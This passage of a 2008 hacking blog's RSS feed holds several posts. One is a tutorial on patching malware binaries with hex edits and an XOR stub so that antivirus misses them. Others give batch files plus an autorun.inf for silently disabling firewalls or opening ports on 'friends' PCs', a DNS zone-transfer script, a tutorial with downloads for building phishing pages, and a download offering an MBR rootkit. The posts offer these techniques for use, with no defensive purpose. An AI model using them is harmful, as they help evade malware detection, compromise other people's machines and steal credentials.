href=&quot;http://www.governmentsecurity.org/&quot;&gt;www.governmentsecurity.org&lt;/a&gt;</description><link>http://dark-computing.blogspot.com/2008/05/pentestingtoolsxls.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-4665619169435169344</guid><pubDate>Wed, 28 May 2008 05:47:00 +0000</pubDate><atom:updated>2008-05-27T22:58:05.534-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorials</category><title>Manual Patching of Malware Binaries</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;The basic idea behind malware patching is to make it undetectable to anti-virus softwares.Remember that an antivirus signature is nothing but a specific value at a specific address.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;Signature = Value x Address&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;So if we are able to  change either the value or the address or a combination of both, we would sucessfully bypass most of the anti-viruses (i am talking about the regular AV&#39;s not the one&#39;s with the Heuristic Scanning capabilities).This technique has been around for quite some time now and can be divided into two methods&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;A) Hex editing the malware binary (Alter the value)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Signature = Value x Address&lt;br /&gt;&lt;br /&gt;This would involve opening the binary in a hex editor and then trying to find the signature.Assuming that we have the signature present in the bottom half of the binary we open up the binary in a hex editor,scroll to the middle (note the address)then fill the remaining bytes with zero.Now save the binary as top.exe.Again open the orignal binary and fill the upper half with zeroes and save it as bottom.exe.Now scan both halves and you will have the anti-virus triggering at the bottom.exe.Repeat the same procedure with bottom.exe till you are able to locate the signature.Alter the values that are triggering the AV and you have your binary undetected.Repeat the procedure for multiple AV&#39;s.You mite have guessed that not only is the procedure time consuming but there is a high probability that you will tender your binary useless.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;B) Manual patching of the malware binary (Alter the address)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;First let us have a look at the basics of XOR&lt;br /&gt;&lt;br /&gt;If        A XOR B = c&lt;br /&gt;Then  C XOR B = A&lt;br /&gt;&lt;br /&gt;Open the bianry in Olly and you will find that it takes you straight to the entry point(EP).An entry point is the first instruction that a processor will execute once you run the binary.Now if there was some way for us to encrypt the bnary contents so that they are undetectable to the AV and at the same time can be understood by the processor we would achieve our goal.I assume you have a functional knowledge of Olly.This can be done as&lt;br /&gt;&lt;br /&gt;Assumptions&lt;br /&gt;&lt;ul&gt;&lt;li&gt;EP is at address 467EB6&lt;/li&gt;&lt;li&gt;The last instruction is at 567EB6&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Copy the first few instructions after the EP to a notepad &lt;/li&gt;&lt;li&gt;Execute a jump to the Encryption routine&lt;/li&gt;&lt;li&gt;Note the EP address&lt;/li&gt;&lt;li&gt;scroll to the bottom of the code until you find an empty space for your code&lt;/li&gt;&lt;li&gt;Now put an encryption routine here &lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;667EB6&lt;br /&gt;&lt;ul&gt;&lt;li&gt; MOV EAX, 467EB7 (i.e we start encrypting from the &#39;Address of EP + 1&#39;&lt;/li&gt;&lt;li&gt;                XOR BYTE PTR[EAX,0B] (XOR the contents for of the address with a &#39;key&#39; &#39;0B&#39;)&lt;/li&gt;&lt;li&gt;                INC EAX&lt;/li&gt;&lt;li&gt;                CMP EAX, 567EB7 (End of the Address)&lt;/li&gt;&lt;li&gt;                JNZ 667EB6 (IF not reachd the end then jump to start)&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Now run the exexutable and copy changes to the executable.Now we have something that is like&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;A ( Orignal Malware in our case)  XOR  B (key &#39;0B&#39; in our case) = C (Encrypted Malware Binary)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now try scanning the file with the AV and you will find the file is no longer detected by the AV.When you run the file again the encryption routine will run agin.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;C (Encrypted Malware Binary)  XOR  B (key &#39;0B&#39; in our case) = A (Orignal Malware Code)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This will be decrypted in memory and the malware will go unnoticed, some will detect it in the memory as well(Rem i am only talking about the regular AV&#39;s ). I will be doing a video tut on this soon.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://dark-computing.blogspot.com/2008/05/manual-patching.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-4210866111634578744</guid><pubDate>Mon, 19 May 2008 10:39:00 +0000</pubDate><atom:updated>2008-05-20T02:03:52.119-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Misc</category><title>Hello</title><description>Hey people i am back again.For the past few days i have literally been living under a rock with no internet access.I hope to start posting tuts on manual patching of malware binaries and buffer overflows.</description><link>http://dark-computing.blogspot.com/2008/05/hello.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-5101475563371396501</guid><pubDate>Sun, 02 Mar 2008 06:28:00 +0000</pubDate><atom:updated>2008-03-01T22:31:57.623-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Links</category><title>Goolag Scanner, a webauditing tool</title><description>&lt;div align=&quot;justify&quot;&gt;LUBBOCK, TX, February 20th -- Today CULT OF THE DEAD COW (cDc), the world&#39;smost attractive hacker group, announced the release of Goolag Scanner, a webauditing tool. Goolag Scanner enables everyone to audit his or her own website via Google. The scanner technology is based on &quot;Google hacking,&quot; a formof vulnerability research developed by Johnny I Hack Stuff. He&#39;s a lovelyfellow. Go buy him a drink.&lt;br /&gt;&lt;br /&gt;&quot;It&#39;s no big secret that the Web is the platform,&quot; said cDc spokesmodelOxblood Ruffin. &quot;And this platform pretty much sucks from a securityperspective. Goolag Scanner provides one more tool for web site owners topatch up their online properties. We&#39;ve seen some pretty scary holes throughrandom tests with the scanner in North America, Europe, and the Middle East.If I were a government, a large corporation, or anyone with a large web site,I&#39;d be downloading this beast and aiming it at my site yesterday. The vulnerabilities are that serious.&quot;&lt;br /&gt;&lt;br /&gt;Goolag Scanner will be released open source under the GNU Affero GeneralPublic license. It is dedicated to the memory of Wau Holland, founder of theChaos Computer Club, and a true champion of privacy rights and social justice.&lt;br /&gt;&lt;br /&gt;GOOLAG SCANNER FUNCTIONS AND FEATURES&lt;br /&gt;&lt;br /&gt;Goolag Scanner is a standalone windows GUI based application. It uses onexml-based configuration file for its settings. All dorks coming with thedistribution of gS are kept inside one file.&lt;/div&gt;&lt;div align=&quot;justify&quot;&gt;&lt;a href=&quot;http://www.goolag.org/&quot;&gt;&lt;span style=&quot;color:#ff0000;&quot;&gt;http://www.goolag.org/&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align=&quot;justify&quot;&gt;&lt;a href=&quot;http://www.goolag.org/download.html#exe&quot;&gt;&lt;span style=&quot;color:#ff0000;&quot;&gt;http://www.goolag.org/download.html#exe&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align=&quot;justify&quot;&gt;&lt;/div&gt;</description><link>http://dark-computing.blogspot.com/2008/03/goolag-scanner-webauditing-tool.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-6613956318826654063</guid><pubDate>Fri, 29 Feb 2008 05:01:00 +0000</pubDate><atom:updated>2008-02-28T21:05:12.134-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Links</category><title>Cold Boot Attacks on Encryption Keys</title><description>Abstract : Contrary to popular assumption, DRAMs used in most modern computers retain their contents for seconds to minutes after power is lost, even at operating temperatures and even if removed from a motherboard. Although DRAMs become less reliable when they are not refreshed, they are not immediately erased, and their contents persist sufficiently for malicious (or forensic) acquisition of usable full-system memory images.&lt;br /&gt;&lt;br /&gt;These guys have come up with a new and interesting type of attack to recover the encryption keys from the DRAM.&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;http://citp.princeton.edu/memory/&lt;/span&gt;</description><link>http://dark-computing.blogspot.com/2008/02/cold-boot-attacks-on-encryption-keys.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-8243624229934596050</guid><pubDate>Thu, 07 Feb 2008 21:21:00 +0000</pubDate><atom:updated>2008-02-07T13:26:28.265-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorials</category><title>Fun with Windows Firewall</title><description>This goes out to all the guys out there who solely depend on windows firewall&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;c:&gt;copy con disable.bat&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;netsh firewall set opmode disable&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;^z &lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;&lt;span style=&quot;color: rgb(255, 255, 255);&quot;&gt;--&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(255, 255, 255);&quot;&gt; this is cntrl+z.Then hit enter&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;c:&gt;copy con enable.bat&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;netsh firewall set opmode enable&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;^z&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A neat way would be open up specific ports on the firewall&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;c:&gt;copy con openport.bat&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;netsh firewall add portopening TCP 80 websrver&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;^Z&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;To close the port replace add by delete&lt;br /&gt;&lt;br /&gt;Now the fun part create an autorun file that would automatically run the bat file and open the port for you&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;c:&gt;copy con autorun.inf&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;[autorun]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;action=Run&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;shellexecute=openport.bat&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now burn a CD with the autorun.inf and the openport.bat file or put them on your USB drive  and have fun opening ports on your friends PC</description><link>http://dark-computing.blogspot.com/2008/02/fun-with-windows-firewall.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-1723772905882902611</guid><pubDate>Tue, 29 Jan 2008 05:09:00 +0000</pubDate><atom:updated>2008-01-29T23:01:07.772-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorials</category><title>A Zone transfer Script</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;If you are unfamiliar with the term Zone Transfer, I would strongly recommend some googling around a bit to find out more.A nice place to start would be Wikipedia&lt;br /&gt;http://en.wikipedia.org/wiki/DNS_zone_transfer. In a nutshell a Zonetransfer is the act of database replication between a primary and a secondary DNS server.This Zone transfer should strictly occur between two trusted/related DNS servers.However due to misconfiguration of the server,anyone (read untrusted entity)asking for a copy of the DNS server zone would receive one.&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;##########################################&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;#!/bin/bash&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;#save as zonetransfer.sh&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;#chmod +x to make it executable&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;if [ $# -eq 0 ]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;then&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;echo &quot;A Zone Transfer script&quot;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;echo &quot;Usage:./zonetransfer.sh domain name &quot;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;exit 0&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;fi&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;for nameserver in $(host -t ns $1 |cut -d&quot; &quot; -f4)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;do&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;host -l $1 $nameserver|grep &quot;has address&quot;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;done&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;##########################################&lt;/span&gt;&lt;/div&gt;&lt;domain style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;br /&gt;&lt;/domain&gt;</description><link>http://dark-computing.blogspot.com/2008/01/zone-transfer-script.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-6412493541734825062</guid><pubDate>Tue, 15 Jan 2008 02:16:00 +0000</pubDate><atom:updated>2008-01-14T18:38:04.139-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Downloads</category><title>The Hackers CookBook v 4.51</title><description>An excellent book by SensePost , recommended read.&lt;br /&gt;Get it here - &lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;http://rapidshare.com/files/37985858/Hackers_cookbook.rar&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;a href=&quot;http://img149.imageshack.us/my.php?image=image1hn3.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://img149.imageshack.us/img149/5143/image1hn3.th.jpg&quot; alt=&quot;Free Image Hosting at www.ImageShack.us&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;a href=&quot;http://img149.imageshack.us/my.php?image=image1hn3.jpg&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;a href=&quot;http://img292.imageshack.us/my.php?image=image2fg2.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://img292.imageshack.us/img292/9780/image2fg2.th.jpg&quot; alt=&quot;Free Image Hosting at www.ImageShack.us&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;a href=&quot;http://img292.imageshack.us/my.php?image=image2fg2.jpg&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;a href=&quot;http://img292.imageshack.us/my.php?image=image3is6.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://img292.imageshack.us/img292/462/image3is6.th.jpg&quot; alt=&quot;Free Image Hosting at www.ImageShack.us&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;</description><link>http://dark-computing.blogspot.com/2008/01/hackers-cookbook-v-451.html</link><author>noreply@blogger.com (mango)</author><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-3792242539059040720</guid><pubDate>Sun, 13 Jan 2008 07:41:00 +0000</pubDate><atom:updated>2008-01-12T23:53:04.116-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorials</category><title>Tutorial  - Create any Pishing Page</title><description>&lt;div style=&quot;text-align: left;&quot;&gt;This is my first video tutorial ( so you will find me fumbling with the camtesia controls) that will teach you to create a rapidshare phishing page or a matter of fact any phishing page.It will teach you to setup a local server to test/configure the page for redirections and logging.&lt;br /&gt;&lt;br /&gt;The tutorial can be found here (With the tools required) - &lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;http://rapidshare.com/files/64791243/fishing_tut.rar&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The complete  rapidshare pishinhg pack can be found here - &lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;http://rapidshare.com/files/63672519/Rapidshare_Fishing__Pack.rar&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://dark-computing.blogspot.com/2008/01/tutorial-create-any-pishing-page.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-6879576514975427856</guid><pubDate>Sun, 13 Jan 2008 07:31:00 +0000</pubDate><atom:updated>2008-01-12T23:36:41.382-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>Using Printers to Stash and Serve Large Files</title><description>I have to say I have not had this much fun with Google for a while! It&#39;s just plain crazy seeing what people have stashed away in their web sites. A simple crafted query can turn up some pretty interesting things. I am not going to be writing about how to find files, eBooks, movies etc for the queries are pretty much there on the web. The new interesting thing printers and cams.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;    A very interesting thing to notice is that the Hewlett-Packard LaserJet 4100 MFP and some other HP printers that I connected to have a 20GB hard drive, which makes for a great place to hide and serve large files.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Read More - &lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;http://rapidshare.com/files/80261496/A_Simple_Search.rar&lt;/span&gt;</description><link>http://dark-computing.blogspot.com/2008/01/using-printers-to-stash-and-serve-large.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-9020454309994903065</guid><pubDate>Sun, 13 Jan 2008 07:27:00 +0000</pubDate><atom:updated>2008-01-13T03:30:52.355-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Malware</category><title>The MBR Rootkit</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;postbody&quot;&gt;A new family of malicious software that runs before Windows even boots up has infected thousands of PCs worldwide and remains undetected by virtually all of the commercial anti-virus tools, security experts warn. &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;postbody&quot;&gt;  &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;postbody&quot;&gt;The newly-discovered rootkit, hides its files in the &quot;master boot record&quot; (MBR), one of the deepest recesses of the PC&#39;s hard drive. The MBR is the place PCs consult after first being turned on to see where to find a bootable operating system. &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;postbody&quot;&gt;  &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;postbody&quot;&gt;As it happens, the method used by the malware to write itself to the Windows MBR has been known for several years now: Many of its features and infection methods were detailed in a proof-of-concept paper presented by researchers from eEye Digital Security in 2005 at the annual Black Hat hacker convention in Las Vegas. Last week, a rootkit that built on the methods described in the eEye paper was discovered &quot;in the wild&quot; and documented in a write-up by the folks behind GMER, one of the few anti-rootkit applications that successfully detects and removes this particular rootkit. &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;postbody&quot;&gt;  &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;postbody&quot;&gt;Known as Trojan.Mebroot(by symantec), it is finding its way onto PCs through drive-by downloads, the attackers&#39; old standby infection method. Once it&#39;s on a machine, the Trojan overwrites the MBR (master boot record) to ensure that it&#39;s loaded at startup. It also installs a custom backdoor.The main problem is that some versions of Microsoft Windows allow programs to overwrite disk sectors directly (including the MBR) from user mode, without restrictions. As such, writing a new MBR into Sector 0 as a standard user is a relatively easy task. &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;postbody&quot;&gt;  &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;postbody&quot;&gt; Nothing like starting the year off with a nasty little Trojan. Good times &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;postbody&quot;&gt;  &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;postbody&quot;&gt;  &lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;postbody&quot;&gt; The rootkit can be found here - &lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;http://rapidshare.com/files/83013949/Rootkit_MBR.rar&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;postbody&quot;&gt; &lt;/span&gt;&lt;/div&gt;</description><link>http://dark-computing.blogspot.com/2008/01/mbr-rootkit.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-4021821157909416199</guid><pubDate>Sun, 13 Jan 2008 07:00:00 +0000</pubDate><atom:updated>2008-01-12T23:01:52.741-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Malware</category><title>The Neosploit Toolkit</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;The Neosploit toolkit is an advanced exploit framework to compromise web site visitors. It was written by &quot;grabarz&quot;. It is unknown if this is a group or an individual. There&#39;s some information which suggests it is an individual.&lt;br /&gt;&lt;br /&gt;It&#39;s not as popular as the Mpack toolkit but is gaining popularity steadily. It was written in the C language and is used as a CGI script. It can support multiple users from the same script. The exploit code will be the same from all users but the delivered executables can be different.&lt;br /&gt;&lt;br /&gt;Similar to other toolkits this one provide various statistics too. Instead of using a database as the means to store them Neosploit uses several files with specific internal structures. The following information about the visitor is logged: Operating System, Web browser and its version, IP address, and the Referer.&lt;br /&gt;&lt;br /&gt;Delivered exploit code is obfuscated using custom Javascript decoding function. The function name and all local variables are random in order to avoid detection by Network IDS. Often, several layers of obfuscation with anti-decoding tricks are used to deter the faint-hearted.&lt;br /&gt;&lt;br /&gt;Toolkit&#39;s URL scheme is designed in such a way which will prohibit thecurious of obtaining the executables even if the same one is used from previous exploits.&lt;br /&gt;&lt;br /&gt;Perhaps the reason for its slow adoption is its high price. It ranges, depending on version, from $1500 to $3000. Common version seen today in the wild is 1.5.x, with 2.0.x in beta mode. First detected version was 1.0.x early this year.&lt;br /&gt;&lt;br /&gt;Unfortunately i dont have the kit to share with you guys.Will be uploading here asap.&lt;/div&gt;</description><link>http://dark-computing.blogspot.com/2008/01/neosploit-toolkit.html</link><author>noreply@blogger.com (mango)</author><thr:total>1</thr:total></item></channel></rss>